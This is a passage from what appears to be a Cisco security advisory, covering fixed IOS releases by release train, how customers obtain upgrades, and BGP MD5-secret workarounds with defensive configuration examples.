     |             |\n+----------+-------------+---------+-------------+\n| 11.2P    | 11.2(26)P6  |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-21 |         |             |\n+----------+-------------+---------+-------------+\n| 11.2SA   | 11.2(8)SA6 Vulnerable. Migrate to   |\n|          | 12.0                                |\n+----------+-------------+---------+-------------+\n| Affected | Rebuild     | Interim | Maintenance |\n| 11.3     |             | **      |             |\n| -Based   |             |         |             |\n| Release  |             |         |             |\n+----------+-------------+---------+-------------+\n| 11.3     | 11.3 Vulnerable. Migrate to 12.0    |\n|          +-------------+---------+-------------+\n|          | 11.3(11b)T4 |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-21 |         |             |\n|          +-------------+---------+-------------+\n|          | 11.3(11e)   |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-21 |         |             |\n+----------+-------------+---------+-------------+\n| Affected | Rebuild     | Interim | Maintenance |\n| 12.0     |             | **      |             |\n| -Based   |             |         |             |\n| Release  |             |         |             |\n+----------+-------------+---------+-------------+\n| 12.0     | 12.0(28)    |         |             |\n+----------+-------------+---------+-------------+\n| 12.0DA   | 12.0DA Vulnerable. Migrate to       |\n|          | 12.2DA                              |\n+----------+-------------------------------------+\n| 12.0DB   | 12.0DB Vulnerable. Migrate to       |\n|          | 12.1DB                              |\n+----------+-------------------------------------+\n| 12.0DC   | 12.0DC Vulnerable. Migrate to       |\n|          | 12.1DC                              |\n+----------+-------------+---------+-------------+\n| 12.0S    | 12.0(27)S   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.0(26)S2  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.0(16)S11 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.0(24)S5  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.0(25)S3  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.0(23)S6  |         |             |\n+----------+-------------+---------+-------------+\n| 12.0SL   | 12.0SL Vulnerable. Migrate to 12.0  |\n|          | (23)S3                              |\n+----------+-------------------------------------+\n| 12.0ST   | 12.0ST Vulnerable. Migrate to 12.0  |\n|          | (26)S2                              |\n+----------+-------------------------------------+\n| 12.0SX   | 12.0(25)SX4 Not built - contact TAC |\n+----------+-------------------------------------+\n| 12.0SZ   | 12.0SZ Vulnerable. Migrate to 12.0  |\n|          | (26)S2                              |\n+----------+-------------------------------------+\n| 12.0T    | 12.0T Vulnerable. Migrate to 12.1   |\n+----------+-------------+---------+-------------+\n| 12.0W5   | 12.0(28)W5  |         |             |\n|          | (30)        |         |             |\n+----------+-------------+---------+-------------+\n| 12.0WC   | 12.0(5)WC9a |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-21 |         |             |\n+----------+-------------+---------+-------------+\n| 12.0WT   | 12.0(13)WT Vulnerable. End of       |\n|          | Engineering                         |\n+----------+-------------------------------------+\n| 12.0WX   | 12.0(4)WX Vulnerable. Migrate to    |\n|          | 12.0W5                              |\n+----------+-------------------------------------+\n| 12.0XA   | 12.0(1)XA Vulnerable. Migrate to    |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XB   | 12.0(1)XB Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.0XC   | 12.0(2)XC Vulnerable. Migrate to    |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XD   | 12.0(2)XD Vulnerable. Migrate to    |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XE   | 12.0(7)XE Vulnerable. Migrate to    |\n|          | 12.1E Latest                        |\n+----------+-------------------------------------+\n| 12.0XG   | 12.0(3)XG Vulnerable. Migrate to    |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XH   | 12.0(4)XH Vulnerable. Migrate to    |\n|          | 12.1                                |\n+----------+-------------------------------------+\n| 12.0XI   | 12.0(4)XI Vulnerable. Migrate to    |\n|          | 12.1                                |\n+----------+-------------------------------------+\n| 12.0XJ   | 12.0(4)XJ Vulnerable. Migrate to    |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XK   | 12.0(7)XK Vulnerable. Migrate to    |\n|          | 12.1T Latest                        |\n+----------+-------------------------------------+\n| 12.0XL   | 12.0(4)XL Vulnerable. Migrate to    |\n|          | 12.2 Latest                         |\n+----------+-------------------------------------+\n| 12.0XM   | 12.0(4)XM Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.0XN   | 12.0(5)XN Vulnerable. Migrate to    |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XP   | 12.0(5.1)XP Vulnerable. Migrate to  |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XQ   | 12.0(5)XQ Vulnerable. Migrate to    |\n|          | 12.1 Latest                         |\n+----------+-------------------------------------+\n| 12.0XR   | 12.0(7)XR Vulnerable. Migrate to    |\n|          | 12.2 Latest                         |\n+----------+-------------------------------------+\n| 12.0XS   | 12.0(5)XS Vulnerable. Migrate to    |\n|          | 12.1E Latest                        |\n+----------+-------------------------------------+\n| 12.0XU   | 12.0(5)XU Vulnerable. Migrate to    |\n|          | 12.0(5)WC                           |\n+----------+-------------------------------------+\n| 12.0XV   | 12.0(7)XV Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------+---------+-------------+\n| Affected | Rebuild     | Interim | Maintenance |\n| 12.1     |             | **      |             |\n| -Based   |             |         |             |\n| Release  |             |         |             |\n+----------+-------------+---------+-------------+\n| 12.1     | 12.1(20a)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(4c)    |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(22a)   |         |             |\n+----------+-------------+---------+-------------+\n| 12.1AA   | 12.1(10)AA Vulnerable. Migrate to   |\n|          | 12.2 Latest                         |\n+----------+-------------+---------+-------------+\n| 12.1AX   | 12.1(14)AX  |         |             |\n+----------+-------------+---------+-------------+\n| 12.1AY   | 12.1(13)AY Vulnerable. Migrate to   |\n|          | 12.1(14)EA1                         |\n+----------+-------------------------------------+\n| 12.1DA   | 12.2DA Vulnerable. Migrate to       |\n|          | 12.2DA                              |\n+----------+-------------------------------------+\n| 12.1DB   | 12.1(5)DB Vulnerable. Migrate to    |\n|          | 12.2B                               |\n+----------+-------------+---------+-------------+\n| 12.1E    | 12.1(19)E7  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(22)E1  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(11b)   |         |             |\n|          | E14         |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(20)E2 Not built - contact TAC  |\n|          +-------------+---------+-------------+\n|          | 12.1(19)E6  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(13)E13 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(8b)E18 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(14)E10 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(13)E14 |         |             |\n+----------+-------------+---------+-------------+\n| 12.1EA   | 12.1(20)EA1 |         |             |\n+----------+-------------+---------+-------------+\n| 12.1EB   | 12.1(20)EB  |         |             |\n+----------+-------------+---------+-------------+\n| 12.1EC   | 12.1(20)EC  |         |             |\n+----------+-------------+---------+-------------+\n| 12.1EO   | 12.1(20)EO  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.1(19)EO2 |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-25 |         |             |\n+----------+-------------+---------+-------------+\n| 12.1EU   | 12.1(20)EU  |         |             |\n+----------+-------------+---------+-------------+\n| 12.1EV   | 12.1(12c)EV Vulnerable. Migrate to  |\n|          | 12.2(RLS4)S                         |\n+----------+-------------+---------+-------------+\n| 12.1EW   | 12.1(20)EW2 |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-21 |         |             |\n+----------+-------------+---------+-------------+\n| 12.1EX   | 12.1EX Vulnerable. Migrate to 12.1  |\n|          | (14)E                               |\n+----------+-------------------------------------+\n| 12.1EY   | 12.1(10)EY Vulnerable. Migrate to   |\n|          | 12.1(14)E                           |\n+----------+-------------+---------+-------------+\n| 12.1T    | 12.1(5)T17  |         |             |\n+----------+-------------+---------+-------------+\n| 12.1XA   | 12.1(1)XA Vulnerable. Migrate to    |\n|          | 12.1(5)T18                          |\n+----------+-------------------------------------+\n| 12.1XB   | 12.1(1)XB Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1XC   | 12.1(1)XC Vulnerable. Migrate to    |\n|          | 12.2                                |\n+----------+-------------------------------------+\n| 12.1XD   | 12.1(1)XD Vulnerable. Migrate to    |\n|          | 12.2                                |\n+----------+-------------------------------------+\n| 12.1XE   | 12.1(1)XE Vulnerable. Migrate to    |\n|          | 12.1E Latest                        |\n+----------+-------------------------------------+\n| 12.1XF   | 12.1(2)XF Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1XG   | 12.1(3)XG Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1XH   | 12.1(2a)XH Vulnerable. Migrate to   |\n|          | 12.2                                |\n+----------+-------------------------------------+\n| 12.1XI   | 12.1(3a)XI Vulnerable. Migrate to   |\n|          | 12.2 Latest                         |\n+----------+-------------------------------------+\n| 12.1XJ   | 12.1(3)XJ Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1XL   | 12.1(3)XL Vulnerable. Migrate to    |\n|          | 12.2T Latest                        |\n+----------+-------------------------------------+\n| 12.1XM   | 12.1(5)XM Vulnerable. Migrate to    |\n|          | 12.2T Latest                        |\n+----------+-------------------------------------+\n| 12.1XP   | 12.1(3)XP Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1XQ   | 12.1(3)XQ Vulnerable. Migrate to    |\n|          | 12.2T Latest                        |\n+----------+-------------------------------------+\n| 12.1XR   | 12.1(5)XR Vulnerable. Migrate to    |\n|          | 12.2T Latest                        |\n+----------+-------------------------------------+\n| 12.1XT   | 12.1(3)XT Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1XU   | 12.1(5)XU Vulnerable. Migrate to    |\n|          | 12.2T Latest                        |\n+----------+-------------------------------------+\n| 12.1XV   | 12.1(5)XV Vulnerable. Migrate to    |\n|          | 12.2XB                              |\n+----------+-------------------------------------+\n| 12.1YA   | 12.1(5)YA Vulnerable. Migrate to    |\n|          | 12.2(8)T                            |\n+----------+-------------------------------------+\n| 12.1YB   | 12.1(5)YB Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1YC   | 12.1(5)YC Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.1YD   | 12.1(5)YD Vulnerable. Migrate to    |\n|          | 12.2(8)T                            |\n+----------+-------------------------------------+\n| 12.1YE   | 12.1(5)YE5 Vulnerable. Migrate to   |\n|          | 12.2(2)YC                           |\n+----------+-------------------------------------+\n| 12.1YF   | 12.1(5)YF2 Vulnerable. Migrate to   |\n|          | 12.2(2)YC                           |\n+----------+-------------------------------------+\n| 12.1YH   | 12.1(5)YH2 Vulnerable. Migrate to   |\n|          | 12.2(13)T                           |\n+----------+-------------------------------------+\n| 12.1YI   | 12.1(5)YI2 Vulnerable. Migrate to   |\n|          | 12.2(2)YC                           |\n+----------+-------------------------------------+\n| 12.1YJ   | 12.1(11)YJ Vulnerable. Migrate to   |\n|          | 12.1EA Latest                       |\n+----------+-------------+---------+-------------+\n| Affected | Rebuild     | Interim | Maintenance |\n| 12.2     |             | **      |             |\n| -Based   |             |         |             |\n| Release  |             |         |             |\n+----------+-------------+---------+-------------+\n| 12.2     | 12.2(19b)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(16f)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(21a)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(23)    |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(12i)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(10g)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(13e)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(17d)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(21b)   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(23a)   |         |             |\n+----------+-------------+---------+-------------+\n| 12.2B    | 12.2(2)B - 12.2(4)B7 Vulnerable.    |\n|          | Migrate to 12.2(13)T12              |\n|          +-------------------------------------+\n|          | 12.2(4)B8 AND FWD Vulnerable.       |\n|          | Migrate to 12.3(5a)B1               |\n+----------+-------------+---------+-------------+\n| 12.2BC   | 12.2(15)    |         |             |\n|          | BC1C        |         |             |\n+----------+-------------+---------+-------------+\n| 12.2BW   | 12.2(4)BW Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------+---------+-------------+\n| 12.2BX   | 12.2(16)BX2 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2BY   | 12.2(4)BY Vulnerable. Migrate to    |\n|          | 12.2(15)B                           |\n|          +-------------------------------------+\n|          | 12.2(8)BY Vulnerable. Migrate to    |\n|          | 12.2(8)ZB                           |\n|          +-------------------------------------+\n|          | 12.2(2)BY Vulnerable. Migrate to    |\n|          | 12.2(8)BZ                           |\n+----------+-------------------------------------+\n| 12.2BZ   | 12.2(15)BZ Vulnerable. Migrate to   |\n|          | 12.2(16)BX                          |\n+----------+-------------------------------------+\n| 12.2CX   | 12.2(11)CX Vulnerable. Migrate to   |\n|          | 12.2(15)BC                          |\n+----------+-------------------------------------+\n| 12.2CY   | 12.2(11)CY Vulnerable. Migrate to   |\n|          | 12.2(13)BC1C                        |\n+----------+-------------------------------------+\n| 12.2DD   | 12.2DD Vulnerable. Migrate to 12.2  |\n|          | (4)B1                               |\n+----------+-------------------------------------+\n| 12.2DX   | 12.2(1)DX Vulnerable. Migrate to    |\n|          | 12.2DD                              |\n|          +-------------------------------------+\n|          | 12.2(2)DX Vulnerable. Migrate to    |\n|          | 12.2B Latest                        |\n+----------+-------------+---------+-------------+\n| 12.2EW   | 12.2(18)EW  |         |             |\n+----------+-------------+---------+-------------+\n| 12.2JA   | 12.2(13)JA4 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(13)JA2 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(11)JA3 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2MC   | 12.2(15)    |         |             |\n|          | MC1B        |         |             |\n+----------+-------------+---------+-------------+\n| 12.2S    | 12.2(22)S   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(14)S7  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(20)S1  |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(20)S3  |         |             |\n|          | Available   |         |             |\n|          | on          |         |             |\n|          | 2004-Apr-21 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(18)S3  |         |             |\n+----------+-------------+---------+-------------+\n| 12.2SE   | 12.2(18)SE  |         |             |\n+----------+-------------+---------+-------------+\n| 12.2SW   | 12.2(21)SW  |         |             |\n+----------+-------------+---------+-------------+\n| 12.2SX   | 12.2(17a)   |         |             |\n|          | SX2         |         |             |\n+----------+-------------+---------+-------------+\n| 12.2SXA  | 12.2(17b)   |         |             |\n|          | SXA1        |         |             |\n+----------+-------------+---------+-------------+\n| 12.2SXB  | 12.2(17d)SXB1 Not built - contact   |\n|          | TAC                                 |\n+----------+-------------+---------+-------------+\n| 12.2SY   | 12.2(14)SY3 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2SZ   | 12.2(14)SZ6 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2T    | 12.2(15)T11 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(13)T12 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(11)T11 Not built - contact TAC |\n|          +-------------+---------+-------------+\n|          | 12.2(13)T11 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2XA   | 12.2(2)XA Vulnerable. Migrate to    |\n|          | 12.2(11)T                           |\n+----------+-------------------------------------+\n| 12.2XB   | 12.2(2)XB Vulnerable. Migrate to    |\n|          | 12.2(15)T                           |\n+----------+-------------------------------------+\n| 12.2XC   | 12.2(2)XC Vulnerable. Migrate to    |\n|          | 12.2(8)ZB                           |\n+----------+-------------------------------------+\n| 12.2XD   | 12.2(1)XD Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XE   | 12.2(1)XE Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XF   | 12.2(1)XF1 Vulnerable. Migrate to   |\n|          | 12.2(4)BC1C                         |\n+----------+-------------------------------------+\n| 12.2XG   | 12.2(2)XG Vulnerable. Migrate to    |\n|          | 12.2(8)T                            |\n+----------+-------------------------------------+\n| 12.2XH   | 12.2(2)XH Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XI   | 12.2(2)XI2 Vulnerable. Migrate to   |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XJ   | 12.2(2)XJ Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XK   | 12.2(2)XK Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XL   | 12.2(4)XL Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XM   | 12.2(4)XM Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XN   | 12.2(2)XN Vulnerable. Migrate to    |\n|          | 12.2(11)T                           |\n+----------+-------------------------------------+\n| 12.2XQ   | 12.2(2)XQ Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XS   | 12.2(1)XS Vulnerable. Migrate to    |\n|          | 12.2(11)T                           |\n+----------+-------------------------------------+\n| 12.2XT   | 12.2(2)XT Vulnerable. Migrate to    |\n|          | 12.2(11)T                           |\n+----------+-------------------------------------+\n| 12.2XU   | 12.2(2)XU Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2XW   | 12.2(4)XW Vulnerable. Migrate to    |\n|          | 12.2(13)T12                         |\n+----------+-------------------------------------+\n| 12.2YA   | 12.2(4)YA Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2YB   | 12.2(4)YB Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2YC   | 12.2(2)YC Vulnerable. Migrate to    |\n|          | 12.2(11)T11                         |\n+----------+-------------------------------------+\n| 12.2YD   | 12.2(8)YD Vulnerable. Migrate to    |\n|          | 12.2(8)YY                           |\n+----------+-------------------------------------+\n| 12.2YE   | 12.2(9)YE Vulnerable. Migrate to    |\n|          | 12.2S                               |\n+----------+-------------------------------------+\n| 12.2YF   | 12.2(4)YF Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2YG   | 12.2(4)YG Vulnerable. Migrate to    |\n|          | 12.2(13)T12                         |\n+----------+-------------------------------------+\n| 12.2YH   | 12.2(4)YH Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2YJ   | 12.2(8)YJ Vulnerable. Migrate to    |\n|          | 12.2(15)T12                         |\n+----------+-------------------------------------+\n| 12.2YK   | 12.2(2)YK Vulnerable. Migrate to    |\n|          | 12.2(13)ZC                          |\n+----------+-------------------------------------+\n| 12.2YL   | 12.2(8)YL Vulnerable. Migrate to    |\n|          | 12.3(2)T                            |\n+----------+-------------------------------------+\n| 12.2YM   | 12.2(8)YM Vulnerable. Migrate to    |\n|          | 12.3(2)T                            |\n+----------+-------------------------------------+\n| 12.2YN   | 12.2(8)YN Vulnerable. Migrate to    |\n|          | 12.3(2)T                            |\n+----------+-------------------------------------+\n| 12.2YO   | 12.2(9)YO Vulnerable. Migrate to    |\n|          | 12.2(14)SY                          |\n+----------+-------------------------------------+\n| 12.2YP   | 12.2(11)YP Vulnerable. Migrate to   |\n|          | 12.2T Latest                        |\n+----------+-------------------------------------+\n| 12.2YQ   | 12.2(11)YQ Vulnerable. Migrate to   |\n|          | 12.3(2)T                            |\n+----------+-------------------------------------+\n| 12.2YR   | 12.2(11)YR Vulnerable. Migrate to   |\n|          | 12.3(2)T                            |\n+----------+-------------------------------------+\n| 12.2YS   | 12.2(11)YS Vulnerable. Migrate to   |\n|          | 12.3T                               |\n+----------+-------------------------------------+\n| 12.2YT   | 12.2(11)YT Vulnerable. Migrate to   |\n|          | 12.2(15)T                           |\n+----------+-------------------------------------+\n| 12.2YU   | 12.2(11)YU Vulnerable. Migrate to   |\n|          | 12.3(2)T                            |\n+----------+-------------------------------------+\n| 12.2YV   | 12.2(11)YV Vulnerable. Migrate to   |\n|          | 12.3(4)T                            |\n+----------+-------------------------------------+\n| 12.2YW   | 12.2(8)YW Vulnerable. Migrate to    |\n|          | 12.3(2)T                            |\n+----------+-------------------------------------+\n| 12.2YX   | 12.2(11)YX Vulnerable. Migrate to   |\n|          | 12.2(RLS3)S                         |\n+----------+-------------------------------------+\n| 12.2YY   | 12.2(8)YY Vulnerable. Migrate to    |\n|          | 12.3(1)T                            |\n+----------+-------------------------------------+\n| 12.2YZ   | 12.2(11)YZ Vulnerable. Migrate to   |\n|          | 12.2(14)SZ                          |\n+----------+-------------+---------+-------------+\n| 12.2ZA   | 12.2(14)ZA6 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2ZB   | 12.2(8)ZB Vulnerable. Migrate to    |\n|          | 12.3T                               |\n+----------+-------------------------------------+\n| 12.2ZC   | 12.2(13)ZC Vulnerable. Migrate to   |\n|          | 12.3T                               |\n+----------+-------------+---------+-------------+\n| 12.2ZD   | 12.2(13)ZD1 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2ZE   | 12.2(13)ZE Vulnerable. Migrate to   |\n|          | 12.3                                |\n+----------+-------------------------------------+\n| 12.2ZF   | 12.2(13)ZF Vulnerable. Migrate to   |\n|          | 12.3(4)T                            |\n+----------+-------------------------------------+\n| 12.2ZG   | 12.2(13)ZG Vulnerable. Migrate to   |\n|          | 12.3(4)T                            |\n+----------+-------------------------------------+\n| 12.2ZH   | 12.2(13)ZH Vulnerable. Migrate to   |\n|          | 12.3(4)T                            |\n+----------+-------------------------------------+\n| 12.2ZI   | 12.2(11)ZI Vulnerable. Migrate to   |\n|          | 12.2(18)S                           |\n+----------+-------------+---------+-------------+\n| 12.2ZJ   | 12.2(15)ZJ5 |         |             |\n|          +-------------+---------+-------------+\n|          | 12.2(15)ZJ4 |         |             |\n+----------+-------------+---------+-------------+\n| 12.2ZK   | 12.2(15)ZK Vulnerable. Migrate to   |\n|          | 12.3T                               |\n+----------+-------------------------------------+\n| 12.2ZL   | 12.2(15)ZL Vulnerable. Migrate to   |\n|          | 12.3(7)T                            |\n+----------+-------------------------------------+\n| 12.2ZN   | 12.2(15)ZN Vulnerable. Migrate to   |\n|          | 12.3(2)T                            |\n+----------+-------------+---------+-------------+\n| 12.2ZP   | 12.2(13)ZP3 |         |             |\n+----------+-------------+---------+-------------+\n| Affected | Rebuild     | Interim | Maintenance |\n| 12.3     |             | **      |             |\n| -Based   |             |         |             |\n| Release  |             |         |             |\n+----------+-------------+---------+-------------+\n| 12.3     | 12.3(3e)    |         |             |\n|          +-------------+---------+-------------+\n|          | 12.3(6)     |         |             |\n|          +-------------+---------+-------------+\n|          | 12.3(5b)    |         |             |\n+----------+-------------+---------+-------------+\n| 12.3B    | 12.3(5a)B   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.3(3)B1   |         |             |\n+----------+-------------+---------+-------------+\n| 12.3BW   | 12.3(1a)BW Vulnerable. Migrate to   |\n|          | 12.3B                               |\n+----------+-------------+---------+-------------+\n| 12.3T    | 12.3(2)T4   |         |             |\n|          +-------------+---------+-------------+\n|          | 12.3(7)T1 Not built - contact TAC   |\n|          +-------------+---------+-------------+\n|          | 12.3(4)T3   |         |             |\n+----------+-------------+---------+-------------+\n| 12.3XA   | 12.3(2)XA Vulnerable. Contact TAC.  |\n+----------+-------------+---------+-------------+\n| 12.3XB   | 12.3(2)XB2  |         |             |\n+----------+-------------+---------+-------------+\n| 12.3XC   | 12.3(2)XC2  |         |             |\n+----------+-------------+---------+-------------+\n| 12.3XD   | 12.3(4)XD1  |         |             |\n+----------+-------------+---------+-------------+\n| 12.3XE   | 12.3(2)XE Vulnerable. Migrate to    |\n|          | 12.3T                               |\n+----------+-------------------------------------+\n| 12.3XF   | 12.3(2)XF Vulnerable. Contact TAC   |\n|          | if needed.                          |\n+----------+-------------+---------+-------------+\n| 12.3XG   | 12.3(4)XG   |         |             |\n+----------+-------------+---------+-------------+\n| 12.3XH   | 12.3(4)XH   |         |             |\n+----------+-------------+---------+-------------+\n| 12.3XI   | 12.3(7)XI Vulnerable. Migrate to    |\n|          | 12.3T                               |\n+----------+-------------------------------------+\n| 12.3XJ   | 12.3(7)XJ Vulnerable. Contact TAC   |\n|          | if needed                           |\n+----------+-------------+---------+-------------+\n| 12.3XK   | 12.3(4)XK   |         |             |\n+----------+-------------+---------+-------------+\n| 12.3XL   | 12.3(7)XL Vulnerable. Contact Tac   |\n|          | if needed                           |\n+----------+-------------------------------------+\n| 12.3XM   | 12.3(9)XM Vulnerable. Contact TAC   |\n|          | if needed.                          |\n+----------+-------------------------------------+\n| 12.3XN   | 12.3(4)XN Vulnerable. Contact TAC   |\n|          | if needed.                          |\n+----------+-------------------------------------+\n| 12.3XQ   | 12.3(4)XQ Vulnerable. Contact TAC   |\n|          | if needed.                          |\n+----------+-------------------------------------+\n| * All dates are estimated and subject to       |\n| change.                                        |\n|                                                |\n| ** Interim releases are subjected to less      |\n| rigorous testing than regular maintenance      |\n| releases, and may have serious bugs.           |\n+------------------------------------------------+\n\nObtaining Fixed Software\n========================\nCustomers with Service Contracts\n\nCustomers with contracts should obtain upgraded software through their\nregular update channels. For most customers, this means that upgrades\nshould be obtained through the Software Center on Cisco\u0027s worldwide\nwebsite at http://www.cisco.com. \n\nCustomers using Third-party Support Organizations\n\nCustomers whose Cisco products are provided or maintained through prior\nor existing agreement with third-party support organizations such as\nCisco Partners, authorized resellers, or service providers should contact\nthat support organization for assistance with the upgrade, which should\nbe free of charge. \n\nCustomers without Service Contracts\n\nCustomers who purchase direct from Cisco but who do not hold a Cisco\nservice contract and customers who purchase through third-party vendors\nbut are unsuccessful at obtaining fixed software through their point of\nsale should get their upgrades by contacting the Cisco Technical\nAssistance Center (TAC). TAC contacts are as follows. \n   \n   \n  * +1 800 553 2447 (toll free from within North America)\n   \n  * +1 408 526 7209 (toll call from anywhere in the world)\n   \n  * e-mail: tac@cisco.com\n   \n\nSee http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for\nadditional TAC contact information, including special localized telephone\nnumbers and instructions and e-mail addresses for use in various\nlanguages. \n\nPlease have your product serial number available and give the URL of this\nnotice as evidence of your entitlement to a free upgrade. Free upgrades\nfor non-contract customers must be requested through the TAC. \n\nPlease do not contact either \"psirt@cisco.com\" or\n\"security-alert@cisco.com\" for software upgrades. \n\nWorkarounds\n===========\nThe effectiveness of any workaround is dependent on specific customer\nsituations such as product mix, network topology, traffic behavior, and\norganizational mission. Due to the variety of affected products and\nreleases, customers should consult with their service provider or support\norganization to ensure any applied workaround is the most appropriate for\nuse in the intended network before it is deployed. \n\nThere are no workarounds available to mitigate the effects of this\nvulnerability on Cisco IOS Firewall. \n\nFor BGP, we will present the workaround and only a few mitigation\ntechniques. For additional information regarding BGP security risk\nassessment, mitigation techniques, and deployment best practices, please\nconsult ftp://ftp-eng.cisco.com/cons/isp/security/\nBGP-Risk-Assesment-v.pdf. \n   \n   \n  * BGP MD5 secret\n   \n    The workaround for BGP is to configure MD5 secret for each session\n    between peers. This can be configured as shown in the following\n    example:\n      router(config)#router bgp \u003cAS-_number\u003e\n      router(config-router)#neighbor \u003cIP_address\u003e password \u003center_your_secret_here\u003e\n       \n    It is necessary to configure the same shared MD5 secret on both peers\n    and at the same time. Failure to do so will break the existing BGP\n    session and the new session will not get established until the exact\n    same secret is configured on both devices. For a detailed discussion\n    on how to configure BGP, refer to the following document \n    http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/\n    products_configuration_guide_chapter09186a00800ca571.html . Once the\n    secret is configured, it is prudent to change it periodically. The\n    exact period must fit within your company security policy but it\n    should not be longer than a few months. When changing the secret,\n    again it must be done at the same time on both devices. Failure to do\n    so will break your existing BGP session. The exception is if your\n    Cisco IOS software release contains the integrated CSCdx23494 ( \n    registered customers only) fix. With this fix, the BGP session will\n    not be terminated when the MD5 secret is changed only on one side. \n    The BGP updates, however, will not be processed until either the same\n    secret is configured on both devices or the secret is removed from\n    both devices. \n   \n\nIt is possible to mitigate the exposure for BGP on this vulnerability by\napplying one or more of the following measures which will lessen the\npotential for the necessary spoofing required to implement a successful\nattack:\n   \n   \n  * Blocking access to the core infrastructure\n   \n    Although it is often difficult to block traffic transiting your\n    network, it is possible to identify traffic which should never be\n    allowed to target your infrastructure devices and block that traffic\n    at the border of your 